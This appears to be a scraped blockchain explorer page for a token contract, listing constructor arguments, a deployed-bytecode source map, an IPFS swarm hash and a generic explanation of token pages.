Arg [1] : minVals (uint256): 2258425949476636143954831924035886012022668787301426424640872093233
-----Encoded View---------------
2 Constructor Arguments found :
Arg [0] : 0000000000000000000000004019d8340405409c008000081c6008849d100011
Arg [1] : 000000001571edeb3345ed18413dd8bd5415f19c008120dd3f764d8ddd1b9631
Deployed Bytecode Sourcemap
8757:10326:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10862:94;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12153:193;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;12153:193:0;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;11020:102;;;:::i;:::-;;;;;;;;;;;;;;;;12817:444;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;12817:444:0;;;;;;;;;;;;;;;;;:::i;10550:86::-;;;:::i;:::-;;;;;;;;;;;;;;;;;;;13669:281;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;13669:281:0;;;;;;;;:::i;11184:162::-;;;;;;;;;;;;;;;;-1:-1:-1;11184:162:0;-1:-1:-1;;;;;11184:162:0;;:::i;10175:146::-;;;:::i;:::-;;10402:81;;;:::i;:::-;;;;-1:-1:-1;;;;;10402:81:0;;;;;;;;;;;;;;10701:98;;;:::i;14452:381::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;14452:381:0;;;;;;;;:::i;11558:199::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;11558:199:0;;;;;;;;:::i;17225:164::-;;;;;;;;;;;;;;;;-1:-1:-1;17225:164:0;;;;;;;:::i;16377:188::-;;;:::i;16635:582::-;;;;;;;;;;;;;;;;-1:-1:-1;16635:582:0;;;;;;;:::i;11819:188::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;11819:188:0;;;;;;;;;;:::i;10862:94::-;10943:5;10936:12;;;;;;;;-1:-1:-1;;10936:12:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10910:13;;10936:12;;10943:5;;10936:12;;10943:5;10936:12;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10862:94;:::o;12153:193::-;12257:4;12279:37;12288:10;12300:7;12309:6;12279:8;:37::i;:::-;-1:-1:-1;12334:4:0;12153:193;;;;;:::o;11020:102::-;11102:12;;11020:102;:::o;12817:444::-;12951:4;12968:36;12978:6;12986:9;12997:6;12968:9;:36::i;:::-;13015:216;13038:6;13059:10;13084:136;13138:6;13084:136;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;13084:19:0;;;;;;:11;:19;;;;;;;;13104:10;13084:31;;;;;;;;;:136;:35;:136::i;:::-;13015:8;:216::i;:::-;-1:-1:-1;13249:4:0;12817:444;;;;;:::o;10550:86::-;10627:1;10550:86;:::o;13669:281::-;13814:10;13769:4;13861:23;;;:11;:23;;;;;;;;-1:-1:-1;;;;;13861:32:0;;;;;;;;;;13769:4;;13791:129;;13839:7;;13861:48;;13898:10;13861:36;:48::i;11184:162::-;-1:-1:-1;;;;;11320:18:0;11288:7;11320:18;;;:9;:18;;;;;;;11184:162::o;10175:146::-;9802:6;;-1:-1:-1;;;;;9802:6:0;9788:10;:20;9780:65;;;;;-1:-1:-1;;;9780:65:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10234:6:::1;:19:::0;;-1:-1:-1;;;;;;10234:19:0::1;::::0;;10269:44:::1;::::0;10251:1:::1;::::0;10290:10:::1;::::0;10269:44:::1;::::0;10251:1;;10269:44:::1;10175:146::o:0;10402:81::-;10469:6;;-1:-1:-1;;;;;10469:6:0;10402:81;:::o;10701:98::-;10784:7;10777:14;;;;;;;;-1:-1:-1;;10777:14:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10751:13;;10777:14;;10784:7;;10777:14;;10784:7;10777:14;;;;;;;;;;;;;;;;;;;;;;;;14452:381;14557:4;14579:224;14602:10;14627:7;14649:143;14704:15;14649:143;;;;;;;;;;;;;;;;;14661:10;14649:23;;;;:11;:23;;;;;;;;-1:-1:-1;;;;;14649:32:0;;;;;;;;;;;:143;:36;:143::i;11558:199::-;11665:4;11687:40;11697:10;11709:9;11720:6;11687:9;:40::i;17225:164::-;17304:10;:8;:10::i;:::-;17299:24;;17316:7;;17299:24;17375:6;17333:3;:39;17345:25;17358:7;17367:2;17345:12;:25::i;:::-;-1:-1:-1;;;;;17333:39:0;;;;;;;;;;;;-1:-1:-1;17333:39:0;:48;17225:164;;;:::o;16377:188::-;16510:10;16451:8;16494:36;16535:8;16493:64;16377:188;:::o;16635:582::-;16715:18;;;;;;;;;;;;-1:-1:-1;;;16715:18:0;;;;;;-1:-1:-1;;;;;;;;;;;16715:18:0;;;;;;;;16744:13;16760:7;16744:23;;16778:12;16793:6;16778:21;;-1:-1:-1;;;;;;;;;;;16816:62:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;16894:10;:8;:10::i;:::-;16889:24;;16906:7;;;;16889:24;17033:28;17052:1;17056:4;17033:10;:28::i;:::-;16923:9;:106;16982:22;16995:5;17002:1;16982:12;:22::i;:::-;-1:-1:-1;;;;;16923:106:0;-1:-1:-1;;;;;16923:106:0;;;;;;;;;;;;:139;;;;17073:9;17085:4;17073:16;;-1:-1:-1;;;;;;;;;;;17105:58:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17178:14;;17174:27;;17194:7;;;;;17174:27;16635:582;;;;;:::o;11819:188::-;-1:-1:-1;;;;;11971:19:0;;;11939:7;11971:19;;;:11;:19;;;;;;;;:28;;;;;;;;;;;;;11819:188::o;18386:374::-;-1:-1:-1;;;;;18515:20:0;;18507:69;;;;-1:-1:-1;;;18507:69:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;18595:21:0;;18587:68;;;;-1:-1:-1;;;18587:68:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;18666:19:0;;;;;;;:11;:19;;;;;;;;:28;;;;;;;;;;;;;:37;;;18719:33;;;;;;;;;;;;;;;;;18386:374;;;:::o;15323:980::-;-1:-1:-1;;;;;15455:20:0;;15447:70;;;;-1:-1:-1;;;15447:70:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;15536:23:0;;15528:71;;;;-1:-1:-1;;;15528:71:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;;;;;;15615:119:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;15749:11:0;;15763:1;15749:11;;;:3;:11;;;;;;:15;15745:363;;15795:114;15829:6;15795:114;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;15795:11:0;;;;;;:3;:11;;;;;;;:114;:15;:114::i;:::-;-1:-1:-1;;;;;15781:11:0;;;;;;:3;:11;;;;;:128;15745:363;;;15976:120;16016:6;15976:120;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;15976:17:0;;;;;;:9;:17;;;;;;;:120;:21;:120::i;:::-;-1:-1:-1;;;;;15956:17:0;;;;;;:9;:17;;;;;:140;15745:363;-1:-1:-1;;;;;;;;;;;16124:54:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;16212:20:0;;;;;;:9;:20;;;;;;:32;;16237:6;16212:24;:32::i;:::-;-1:-1:-1;;;;;16189:20:0;;;;;;;:9;:20;;;;;;;;;:55;;;;16260:35;;;;;;;16189:20;;16260:35;;;;;;;;;;;;;15323:980;;;:::o;4973:224::-;5093:7;5129:12;5121:6;;;;5113:29;;;;-1:-1:-1;;;5113:29:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;5165:5:0;;;4973:224::o;4088:179::-;4146:7;4178:5;;;4202:6;;;;4194:46;;;;;-1:-1:-1;;;4194:46:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;4258:1;4088:179;-1:-1:-1;;;4088:179:0:o;17736:210::-;17835:7;17864:13;17860:27;;-1:-1:-1;17886:1:0;17879:8;;17860:27;-1:-1:-1;17923:4:0;;17736:210;-1:-1:-1;17736:210:0:o;17461:267::-;17564:7;-1:-1:-1;;;;;17593:24:0;;17589:86;;-1:-1:-1;17641:8:0;17634:29;;17589:86;-1:-1:-1;17702:8:0;17461:267;-1:-1:-1;17461:267:0:o
Swarm Source
ipfs://e2f7af1c4c6933077e2af563aee6447d2d491dd0b35198fa5e75fdfce04db60d
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.